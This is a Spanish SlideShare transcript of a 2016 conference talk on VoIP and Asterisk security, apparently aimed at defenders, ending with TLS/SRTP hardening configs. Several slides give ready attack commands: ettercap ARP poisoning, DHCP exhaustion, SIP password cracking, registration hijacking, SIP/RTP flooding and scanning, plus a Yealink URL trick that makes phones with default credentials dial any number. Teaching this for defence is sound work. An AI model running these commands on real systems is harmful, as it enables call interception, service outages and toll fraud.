Seguridad y ataques de im en entornos corporativosSeguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativos
 
Taller de Hacking (EXIT 2014)
Taller de Hacking (EXIT 2014)Taller de Hacking (EXIT 2014)
Taller de Hacking (EXIT 2014)
 
Ignorancia inalámbrica
Ignorancia inalámbricaIgnorancia inalámbrica
Ignorancia inalámbrica
 
Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017
Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017
Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017
 
DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)
 
Se siente usted seguro con sus dispositivos móviles
Se siente usted seguro con sus dispositivos móvilesSe siente usted seguro con sus dispositivos móviles
Se siente usted seguro con sus dispositivos móviles
 
Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5
Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5
Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5
 
Ataques spoofing y botnet
Ataques spoofing y botnetAtaques spoofing y botnet
Ataques spoofing y botnet
 
Nuevas modalidades de fraude atm
Nuevas modalidades de fraude atmNuevas modalidades de fraude atm
Nuevas modalidades de fraude atm
 
Defeating whats app’s lack of privacy
Defeating whats app’s lack of privacyDefeating whats app’s lack of privacy
Defeating whats app’s lack of privacy
 

Similar a Seguridad en VOIP addons 2016

Presentación3 de Mayra Chiti y Sofia Castellanos
Presentación3 de Mayra Chiti y Sofia CastellanosPresentación3 de Mayra Chiti y Sofia Castellanos
Presentación3 de Mayra Chiti y Sofia Castellanos
mayracm
 
Presentación3
Presentación3Presentación3
Presentación3
Sofcas
 
lola infórmatica tema 2
lola infórmatica tema 2lola infórmatica tema 2
lola infórmatica tema 2
loolaaaa08
 
L as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molinaL as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molina
jei-inform-95
 
L as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molinaL as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molina
jeisonalexander
 
tema 2! :) redes, informatica lola
tema 2! :) redes, informatica lolatema 2! :) redes, informatica lola
tema 2! :) redes, informatica lola
guest1cfabb
 
Redes Y Seguridad InformáTica
Redes Y Seguridad InformáTicaRedes Y Seguridad InformáTica
Redes Y Seguridad InformáTica
eldeinformatica123
 

Similar a Seguridad en VOIP addons 2016 (20)

Foca
FocaFoca
Foca
 
Seguridad en VoIP
Seguridad en VoIPSeguridad en VoIP
Seguridad en VoIP
 
M5 Securización de Redes
M5 Securización de RedesM5 Securización de Redes
M5 Securización de Redes
 
Power point.
Power point.Power point.
Power point.
 
Power point.
Power point.Power point.
Power point.
 
protocolos de internet
protocolos de internet protocolos de internet
protocolos de internet
 
Power point.
Power point.Power point.
Power point.
 
Presentación3 de Mayra Chiti y Sofia Castellanos
Presentación3 de Mayra Chiti y Sofia CastellanosPresentación3 de Mayra Chiti y Sofia Castellanos
Presentación3 de Mayra Chiti y Sofia Castellanos
 
Presentación3
Presentación3Presentación3
Presentación3
 
Presentación3
Presentación3Presentación3
Presentación3
 
SEGURIDAD DE INFORMACIÓN SITUACIÓN ACTUAL
SEGURIDAD DE INFORMACIÓN SITUACIÓN ACTUAL SEGURIDAD DE INFORMACIÓN SITUACIÓN ACTUAL
SEGURIDAD DE INFORMACIÓN SITUACIÓN ACTUAL
 
lola infórmatica tema 2
lola infórmatica tema 2lola infórmatica tema 2
lola infórmatica tema 2
 
La era digital
La era digital La era digital
La era digital
 
Seguridad en VoIP - Hackelarre
Seguridad en VoIP - HackelarreSeguridad en VoIP - Hackelarre
Seguridad en VoIP - Hackelarre
 
L as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molinaL as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molina
 
L as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molinaL as redes y su seguridad...jeison molina
L as redes y su seguridad...jeison molina
 
Gabriela
GabrielaGabriela
Gabriela
 
Gabriela.tema 2 Redes
Gabriela.tema 2 RedesGabriela.tema 2 Redes
Gabriela.tema 2 Redes
 
tema 2! :) redes, informatica lola
tema 2! :) redes, informatica lolatema 2! :) redes, informatica lola
tema 2! :) redes, informatica lola
 
Redes Y Seguridad InformáTica
Redes Y Seguridad InformáTicaRedes Y Seguridad InformáTica
Redes Y Seguridad InformáTica
 

Más de INTELIX INGENIERIA - Rosario Argentina

Más de INTELIX INGENIERIA - Rosario Argentina (10)

NOCIONES BASICAS DE CIBERSEGURIDAD - MINISTERIO SEGURIDAD
NOCIONES BASICAS DE CIBERSEGURIDAD - MINISTERIO SEGURIDADNOCIONES BASICAS DE CIBERSEGURIDAD - MINISTERIO SEGURIDAD
NOCIONES BASICAS DE CIBERSEGURIDAD - MINISTERIO SEGURIDAD
 
Voip2day video conferencia grado militar usando software libre
Voip2day video conferencia grado militar usando software libreVoip2day video conferencia grado militar usando software libre
Voip2day video conferencia grado militar usando software libre
 
MONETIZACION Y BIG DATA ¿NOS HEMOS CONVERTIDO EN BILLETES CON PATAS?
MONETIZACION Y BIG DATA ¿NOS HEMOS CONVERTIDO EN BILLETES CON PATAS?MONETIZACION Y BIG DATA ¿NOS HEMOS CONVERTIDO EN BILLETES CON PATAS?
MONETIZACION Y BIG DATA ¿NOS HEMOS CONVERTIDO EN BILLETES CON PATAS?
 
La seguridad no es un juego, el futbol si
La seguridad no es un juego, el futbol siLa seguridad no es un juego, el futbol si
La seguridad no es un juego, el futbol si
 
Charla de seguridad informática para padres y alumnos de colegios.
Charla de seguridad informática para padres y alumnos de colegios.Charla de seguridad informática para padres y alumnos de colegios.
Charla de seguridad informática para padres y alumnos de colegios.
 
Workshop SEGURIDAD EN TELEFONOS IP YEALINK TLS SRTP SEGURIDAD FISICA
Workshop SEGURIDAD EN TELEFONOS IP YEALINK TLS SRTP SEGURIDAD FISICAWorkshop SEGURIDAD EN TELEFONOS IP YEALINK TLS SRTP SEGURIDAD FISICA
Workshop SEGURIDAD EN TELEFONOS IP YEALINK TLS SRTP SEGURIDAD FISICA
 
Usos responsables de la tecnología para la seguridad Ciudadana
Usos responsables de la tecnología para la seguridad CiudadanaUsos responsables de la tecnología para la seguridad Ciudadana
Usos responsables de la tecnología para la seguridad Ciudadana
 
Ecologia informatica IT FLOSS 2016
Ecologia informatica IT FLOSS 2016Ecologia informatica IT FLOSS 2016
Ecologia informatica IT FLOSS 2016
 
Conferencias Elastix Argentina 2010 con Rafa Bonifaz
Conferencias Elastix Argentina 2010 con Rafa BonifazConferencias Elastix Argentina 2010 con Rafa Bonifaz
Conferencias Elastix Argentina 2010 con Rafa Bonifaz
 
Elastix Rosario 2009
Elastix Rosario 2009Elastix Rosario 2009
Elastix Rosario 2009
 

Último

Presentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptx
LolaBunny11
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
FagnerLisboa3
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx
241521559
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
silviayucra2
 

Último (10)

pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNIT
 
Presentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptx
 
Desarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfDesarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdf
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnología
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Joseph
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
 

Seguridad en VOIP addons 2016

  • 1. Página 112/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en Comunicaciones Unificadas y GNU/Linux Disertante: Ing. Fernando M. Villares Rosario – CIE 2016
  • 2. Página 212/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre El puntapié inicial hacia una noción de seguridad. ¿Han sufrido o conocen sobre algún tipo de ataque a sistemas de comunicaciones? ¿Desde donde espero recibir un ataque? ¿Las comunicaciones son SEGURAS? ¿Es segura la telefonía tradicional? ¿Es seguro el universo de Internet? Análisis Inicial: ¿Sabemos algo? ¿Podemos hacer algo al respecto?
  • 3. Página 312/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre ¿Por donde es posible atacar un sistema de VoIP? Importante:Importante: No olvidar el poder de la ingenieríaNo olvidar el poder de la ingeniería Social sobre la CAPA 8 del modelo OSI (la BIOS).Social sobre la CAPA 8 del modelo OSI (la BIOS).
  • 4. Página 412/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en las terminales Ataques: – Fuzzing – Flood UDP y RTP – Fallas de Firmwares y Bugs – INVITE flood – Fallos de configuración – Servicios no desactivados
  • 5. Página 512/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Fuzzing Envío de paquetes malformados en busca de errores de programación o bugs. Desbordamientos de buffer, tamaño de variables, fallos de segmentación... Herramientas PROTOS SIP Fuzzer VoIPER SiVuS VOIPPACK SIPVICIOUS
  • 6. Página 612/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Flooding Técnica de Denegación de Servicio (DoS) por inundación. Si se envían miles de paquetes basura no podremos procesar los buenos. Recordemos: packet loss, latencia, jitter... Herramientas: Inviteflood Udpflood Rtpflood Sipsak Sipp
  • 7. Página 712/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Error de capa 8, Bestia ignorante operando Sistema Se utiliza un Teléfono Yealink T2xP con firmware anterior al x.61.23.11 (6/6/2012) y se ejecuta dentro de la misma red este comando desde cualquier navegador web: http://user:user@DIR-IP-TELEFONO/cgi- bin/ConfigManApp.com? Id=34&Command=1&Number=NUMERO-A- MARCAR&Account=0 Resultado:Si el teléfono nunca fue actualizado en sus firmwares o sigue teniendo el user y clave por default user/user, llamará automágicamente al Número del comando por la cuenta 0 la cual ya a su vez estará autenticada en nuestra PBX. Imaginar que puede suceder si además, no tenemos en la PBX un limitador de cantidad de llamadas simultáneas por línea....
  • 8. Página 812/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre In-Seguridad en terminales Consecuencias: – Pérdida del servicio. – Desconfiguración de los terminales. – Ejecución de exploits (softphones). ¿Cómo nos defendemos? – Separar la red en diferentes VLANS (voz y datos) – ¡Nada de softphones! – Usar SIP sobre TCP (TLS si es posible) – Actualizaciones de firmware. – Sistemas de mitigación de DoS.
  • 9. Página 912/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en la red Ataques: – Flooding/Fuzzing – Man-In-The-Middle – Eavesdropping – Ataques a servicios: ● TFTP/FTP ● DHCP ● SSH ● Apache/PHP ● MySQL/PostGRE SQL
  • 10. Página 1012/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en la red – Routers / Firewalls Muchos routers poseen el protocolo uPnP, que abre puertos automágicamente. Los routers pueden tener vulnerabilidades o ser susceptibles de instalarles RootKits. Muchos proveedores de datos proveen sus propios routers/firewalls con SIP ALG el cual no puede ser desactivado o sin admin permitida Una config correcta es lo más importante!
  • 11. Página 1112/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Man In The Middle De los ataques más temidos (es el paso previo a otro ataque) Implica situarse en medio de la comunicación, siendo transparente. ¡Toda la información pasa por nosotros! ARP Spoofing para situarnos 'en medio' Ejemplo: #echo 1 > /proc/sys/net/ipv4/ip_forward #ettercap -o -T -P repoison_arp -M arp:remote / 192.168.1.21/ /192.168.1.251/
  • 12. Página 1212/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Eavesdropping (I) El ataque más temido/peligroso!! Una vez hecho el M.I.T.M., todo pasa por nosotros... – Podemos capturar señalización. – ¡Podemos capturar el stream de audio! La privacidad del usuario queda comprometida. Ejemplo: “Una vez que tenemos el MITM podemos usar Wireshark para capturar y analizar el tráfico.”
  • 13. Página 1312/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Eavesdropping (II)
  • 14. Página 1412/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Ataques a servicios Normalmente en una PBX Asterisk se utiliza: TFTP o FTP para aprovisionamiento de fonos. DHCP para obtener una IP. Email para el servicio de fax y Voicemail Si desenchufamos un teléfono y esnifeamos la red, podemos saber que archivo pide. ¡Y pedirlo nosotros, usando la herramienta TFTPTheft! Podemos agotar las direcciones DHCP, para que los fonos no tengan IP, no pudiendo funcionar. Puedo atacar el server de email via un exploit y lograr control del sistema o saturar sus recursos. Ejemplo de agotamiento de direcciones IP: #dhcpx -i eth0 -vv -D 192.168.1.254
  • 15. Página 1512/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en la red (II) Consecuencias: – Privacidad al descubierto. – Interrupción del servicio. – Configuraciones, contraseñas... ¡al descubierto! ¿Cómo nos defendemos? – Separar la red en distintas VLAN (voz y datos desde los switches o routers) – Audio y signalling cifrado: SRTP, TLS – Sistemas de mitigación de DoS.
  • 16. Página 1612/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en la PBX (II) Ataques:Ataques: –– Flooding.Flooding. –– Ataques de peticiones remotasAtaques de peticiones remotas.. –– Cracking deCracking de passwords.passwords. –– REGISTER hijacking.REGISTER hijacking. –– Exploits.Exploits. –– Errores deErrores de configuración.configuración. –– Implementadores de “garage”.Implementadores de “garage”. –– Ing. Social en Sistemas OOTBIng. Social en Sistemas OOTB..
  • 17. Página 1712/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Ataques de peticiones remotas de llamadas. Ataques de gran volumen realizados por bots o maquinas zombies, no se centran en realizar llamadas per se sino en establecer cargos de interconexión ya que los proveedores de telecomunicaciones entre ellos se cobran mínimos cargos de interconexión. Bannear rangos de IP no suele funcionar porque provienen de miles de IP diferentes y en zonas diferentes. Motivación: ganar dinero por cargos de conexión, si se establece la llamada o es a un número premium mucho mejor!!!
  • 18. Página 1812/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Ataques de peticiones remotas de llamadas: PASOS (1) Escaneo de IP y ports. (2) Probar a enviar una petición de llamada anónima a un número de teléfono de la red beneficiaria. (3) Búsqueda de una cuenta SIP vulnerable con la que registrarse. (4) Registro como softphone, llamadas a números donde se encuentra la red beneficiada, si el número no descuelga, algún intermedio descolgará y cobrará llamada internacional, esto no es legal, pero es tremendamente difícil de detectar y denunciar. (5) Se detecta número de canales salientes disponibles, para maximizar el número de llamadas por tiempo y minimizar el número de peticiones a realizar para evitar ser detectado.
  • 19. Página 1912/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Crackeando los passwords en el protocolo SIP Sistema de autenticación mediante HTTP- Digest (RFC2617): – Un usuario intenta registrarse y recibe un error 407 junto con el digest. – El usuario lo cifra con su información (realm, usuario,contraseña) y se lo envía de vuelta. – Si los datos son correctos el proxy podrá autenticarlo. ¡¡Este proceso se hace 'casi' con cada mensaje!! El algoritmo usado es md5, se puede romper. Se suelen usar contraseñas muy simples...
  • 20. Página 2012/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Crackeando los passwords en el protocolo SIP (II) Para romper el cifrado necesitamos capturar los paquetes que viajan en ambos sentidos en el momento de la autenticación mediante HTTP-Digest. Man In The Middle (M.I.T.M.) Herramientas: SIPCcrack, SIPDdump, John The Ripper, Cain & Abel Ejemplo (usando sipdump y sipcrack): #sipdump -i eth0 logins.pcap seq -w 1 9999 | ./sipcrack -s logins.pcap
  • 21. Página 2112/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Register Hijacking Cuando nos registramos con el proxy este guarda nuestra información (Contact) Si tenemos la clave, podemos crear un registro falso. Asterisk solo soporta 1 ubicación :( También podemos des-registrar un usuario, y dejará de recibir llamadas (aunque sí pueda hacerlas). Ejemplo: #reghijacker eth0 192.168.1.21 192.168.1.21 hacker@66.66.66.66 res -u 200 -p 1234
  • 22. Página 2212/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Exploits Errores en la programación que pueden llevar a desbordamientos de buffer, escritura en memoria inválida, fallos de segmentación... Ciertos invites malformados en asterisk 1.8 causaban deadlocks, 1.4.0 daba un core dump con content-lenght<0. El Xlite 1103 al enviarle un INVITE con el 'Content-Length' >= 1073741823 se pone a consumir RAM y decae el rendimiento del sistema. Asterisk es Software Libre, mucha gente lo estudia y por tanto sus fallos se corrigen muy pronto. Pero, ¿Qué pasa con las BlackBox privativas? Eolos, Cisco, Avaya, 3Cx, Denwa, M$ Lync (LoL) etc.
  • 23. Página 2312/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Errores en las configuraciones (siempre Capa 8) allowguest=no ; permite o rechaza las comunicaciones de invitados (por defecto es yes) Contextos y permisos adecuados al nivel de privilegios del usuario. T: Permite que el usuario llamado transfiera una llamada marcando las teclas de transferencia ciega de features.conf. No limitar o controlar el número máximo de llamadas por usuario o troncal de la PBX. IN-seguridad en los canales de conferencias remotos y DISA (vieron MR ROBOT, temporada 2?)
  • 24. Página 2412/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en la PBX (II) Consecuencias: – Interrupción TOTAL o parcial del servicio. – Toll fraud / Fraude de llamadas. – 'Robo' de llamadas. – Escuchas INDEBIDAS. ¿Cómo nos defendemos? – Señalización cifrada. – SIP sobre TCP/TLS. – Activar solo los servicios necesarios. – Firewalls/sistemas de mitigación de DoS. – Segurizar y verificar las configuraciones.
  • 25. Página 2512/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Otros aspectos de seguridad Si hemos conseguido la clave del usuario podemos hacer de todo: – Transferirle llamadas – Colgarle llamadas – Otras posibles molestias...xD... SPAM en VoIP...SPIT – Hola amigo! Desea ser tan feliz como yo? Pues ya puede serlo enviando 1 dólar a Hombre feliz al 742 de Avenida Siempre Viva, no lo dude la felicidad eterna esta a solo un dólar! – Homero J. Simpson
  • 26. Página 2612/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Algunas Herramientas... Sipsak y SIPP son Herramientas estándar para bench- marking y testing de SIP, también las podemos usar para hacer flooding :-) Uso: #sipsak -F -s sip:intelix@172.16.20.100 #sipp 172.16.20.100 (pulsar ++++) Flooding (enviamos 1.000.000 de paquetes): #udpflood 192.168.1.3 192.168.1.251 9 5060 1000000 #inviteflood br0 200 192.168.21 192.168.1.251 1000000 #rtpflood 192.168.1.3 192.168.1.251 9 16384 1000000 15000 2000 1886986910 Cain & Abel: Herramienta completa de cracking con funcionalidades de VoIP. ARP Poisoning con 1 click ¡Eavesdropping con cualquier codec!
  • 27. Página 2712/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Algunas Herramientas (II)... SiVuS: Herramienta de auditoría, seguridad y generación de tráfico SIP, permite testear dispositivos SIP en busca de vulnerabilidades. SipVicious, Conjunto de herramientas de seguridad en VoIP: Svmap (escaneador SIP) Svcrack (crackeador de contraseñas) Svwar (enumerador de extensiones) Uso: svmap.py 192.168.1.1-254 svwar.py -e200-299 192.168.1.111 svcrack.py -u200 dict.dat 192.168.1.111
  • 28. Página 2812/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Algunas Herramientas (III)... Voiper: Potente fuzzer con muchos casos de prueba Se usa en como herramienta de testing para detectar fallos en software y hardware. Uso: #python fuzzer.py -f SIPInviteCommonFuzzer -i 192.168.3.101 -p 5060 -a sessions/scen1 -c 0 #python fuzzer.py -f SIPInviteCommonFuzzer -c 2 -i 192.168.3.101 -p 5060 -a sessions/scen2 -m 1024 #python torturer.py -i 192.168.1.2 -p 5060 -c 0 -t invalid
  • 29. Página 2912/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Análisis final de Seguridad en Comunicaciones IP... En el mundo del SIP sobre UDP y el RTP la VoIP es INSEGURA y punto. Pero, es necesario cierto acceso a la red para poder comprometer la seguridad. Entonces segurizar hoy es no lamentar mañana, por ejemplo por medio de: – Túneles VPN para enlaces a través de Internet. – Distintas VLAN para voz y datos. – Contraseñas robustas, SIP TLS, SRTP. – Servicios más seguros, DHCP por MAC, 802.1x, Switches Layer 2/3. – Firewalls y Sistemas de IDS/IPS.
  • 30. Página 3012/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en comunicaciones VoIP con Asterisk Asterisk en sus ramas desde la 1.8, hasta la actualAsterisk en sus ramas desde la 1.8, hasta la actual 14, soporta cifrado de medios y seguridad en canales14, soporta cifrado de medios y seguridad en canales SIP a través del protocolo SRTP para el sonido y deSIP a través del protocolo SRTP para el sonido y de SIP sobre TLS para la señalización.SIP sobre TLS para la señalización. Asterisk soporta certificados de firma digital, yAsterisk soporta certificados de firma digital, y cifrado AES-128 en su protocolo nativocifrado AES-128 en su protocolo nativo IAX2IAX2 lo cual lolo cual lo convierte en una opción muy atractiva para mantenerconvierte en una opción muy atractiva para mantener la privacidad de la información que circula desde yla privacidad de la información que circula desde y hacia el servidor.hacia el servidor. Se debe tener muchísimo cuidado al segurizar losSe debe tener muchísimo cuidado al segurizar los servidores a usar, ya sea por medio de firewalls deservidores a usar, ya sea por medio de firewalls de filtrado de paquetes, medios seguros de control defiltrado de paquetes, medios seguros de control de acceso y sistemas de auditoría. Por ejemplo:acceso y sistemas de auditoría. Por ejemplo: Fail2BanFail2Ban
  • 31. Página 3112/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Generación de certificados para uso en TLS con asterisk:Generación de certificados para uso en TLS con asterisk: Asterisk posee su propio script para generar certificados digitales…Asterisk posee su propio script para generar certificados digitales… Generación de CA y certificado de servidor:Generación de CA y certificado de servidor: #./ast_tls_cert -C 192.168.2.100 -O "INTELIX" -d /etc/asterisk/keys#./ast_tls_cert -C 192.168.2.100 -O "INTELIX" -d /etc/asterisk/keys Generación de certificados de clientes:Generación de certificados de clientes: #./ast_tls_cert -m client -c /etc/asterisk/keys/ca.crt -k#./ast_tls_cert -m client -c /etc/asterisk/keys/ca.crt -k /etc/asterisk/keys/ca.key -C 192.168.2.1 -O "INTELIX" -d/etc/asterisk/keys/ca.key -C 192.168.2.1 -O "INTELIX" -d /etc/asterisk/keys -o yealink1/etc/asterisk/keys -o yealink1 Cada certificado tiene validez de 1 año y llaves de 4096 bits.Cada certificado tiene validez de 1 año y llaves de 4096 bits. TLS y SRTP en Asterisk
  • 32. Página 3212/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Configuración de TLS en Asterisk 11 y + (sip.conf):Configuración de TLS en Asterisk 11 y + (sip.conf): tlsenable=yestlsenable=yes tlsbindaddr=0.0.0.0:5061tlsbindaddr=0.0.0.0:5061 tlscertfile=/etc/asterisk/keys/asterisk.pemtlscertfile=/etc/asterisk/keys/asterisk.pem tlscafile=/etc/asterisk/keys/ca.crttlscafile=/etc/asterisk/keys/ca.crt tlscapath=/etc/asterisk/keystlscapath=/etc/asterisk/keys tlsdontverifyserver=notlsdontverifyserver=no tlsverifyclient=yestlsverifyclient=yes tlsignorecommonname=notlsignorecommonname=no tlscipher=ALLtlscipher=ALL tlsclientmethod=tlsv1tlsclientmethod=tlsv1 Configuración (sip.conf) en cada usuario:Configuración (sip.conf) en cada usuario: encryptionencryption=yes=yes transport=tlstransport=tls TLS y SRTP en Asterisk
  • 33. Página 3312/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre TLS y SRTP BLINK SOFT PHONE PARA LINUX
  • 34. Página 3412/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre TLS y SRTP BLINK SOFT PHONE PARA LINUX
  • 35. Página 3512/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre TLS y SRTP YEALINK T46G
  • 36. Página 3612/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre TLS y SRTP YEALINK T46G
  • 37. Página 3712/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre TLS y SRTP YEALINK T46G
  • 38. Página 3812/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre ►► Internet Engineering Task Force (Internet Engineering Task Force (www.ietf.orgwww.ietf.org)) RFC 2401-2764-2709-2411-2521-2685-2833RFC 2401-2764-2709-2411-2521-2685-2833 ►► Recursos VoIP – Web Page – (www.recursosvoip.com)Recursos VoIP – Web Page – (www.recursosvoip.com) ►► Cisco VoIP White Papers - www.cisco.comCisco VoIP White Papers - www.cisco.com ►► Voip-Info Web Page – www.voip-info.orgVoip-Info Web Page – www.voip-info.org ►► Digium Home Pages –Digium Home Pages – www.asterisk.orgwww.asterisk.org / www.digium.com/ www.digium.com ►► International Telecommunication Union WebPage - www.itu.intInternational Telecommunication Union WebPage - www.itu.int ►► Voip Novatos -Voip Novatos - www.voipnovatos.eswww.voipnovatos.es ►► FreePBX & TrixBox forums -FreePBX & TrixBox forums - www.trixbox.orgwww.trixbox.org / www.freepbx.org/ www.freepbx.org ►► Irontec Soluciones Linux para empresas -Irontec Soluciones Linux para empresas - www.irontec.comwww.irontec.com ►► Asterisk The definitive guide 3da. Edición. - McGraw Hill 2011Asterisk The definitive guide 3da. Edición. - McGraw Hill 2011 ►► Nerd Vittles Home Page - www.nerdvittles.comNerd Vittles Home Page - www.nerdvittles.com ►► Sinologic.net/Avanzada 7 – Elio Rojano -Sinologic.net/Avanzada 7 – Elio Rojano - www.sinologic.netwww.sinologic.net ►► Commlogik Corporation -Commlogik Corporation - www.commlogik.comwww.commlogik.com ►► Elastix PBX Forums -Elastix PBX Forums - www.elastix.orgwww.elastix.org ►► Polycom Reference Guides and manuals -Polycom Reference Guides and manuals - www.polycom.comwww.polycom.com ►► Asterisk Guru Home Page -Asterisk Guru Home Page - www.asteriskguru.comwww.asteriskguru.com ►► Asterisk Docs -Asterisk Docs - www.asteriskdocs.comwww.asteriskdocs.com ►► Seguridad en Voip -Seguridad en Voip - Saúl Ibarra Corretgé -Saúl Ibarra Corretgé - www.saghul.netwww.saghul.net ►► Asterisk MX Blog – Christian Cabrera – www.asteriskmx.comAsterisk MX Blog – Christian Cabrera – www.asteriskmx.com BIBLIOGRAFÍA CONSULTADA
  • 39. Página 3912/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre LICENCIA DE ESTA PRESENTACIÓN Autor: Ing. Fernando M. Villares Terán 09/2016Autor: Ing. Fernando M. Villares Terán 09/2016 Bajo licencia Creative CommonsBajo licencia Creative Commons http://creativecommons.org/http://creativecommons.org/ Atribución-CompartirIgual 2.5 Argentina (CC BY-SA 2.5)Atribución-CompartirIgual 2.5 Argentina (CC BY-SA 2.5) Consultas: contacto@intelix.com.arConsultas: contacto@intelix.com.ar www.intelix.com.arwww.intelix.com.ar TODAS LAS MARCAS REGISTRADAS NOMBRADAS O UTILIZADASTODAS LAS MARCAS REGISTRADAS NOMBRADAS O UTILIZADAS EN ESTA PRESENTACIÓN SON PROPIEDAD DE SUS RESPECTIVOSEN ESTA PRESENTACIÓN SON PROPIEDAD DE SUS RESPECTIVOS DUEÑOS Y NO DEBEN SER USADAS SIN LA CORRESPONDIENTEDUEÑOS Y NO DEBEN SER USADAS SIN LA CORRESPONDIENTE AUTORIZACIÓN DE LOS MISMOS.AUTORIZACIÓN DE LOS MISMOS.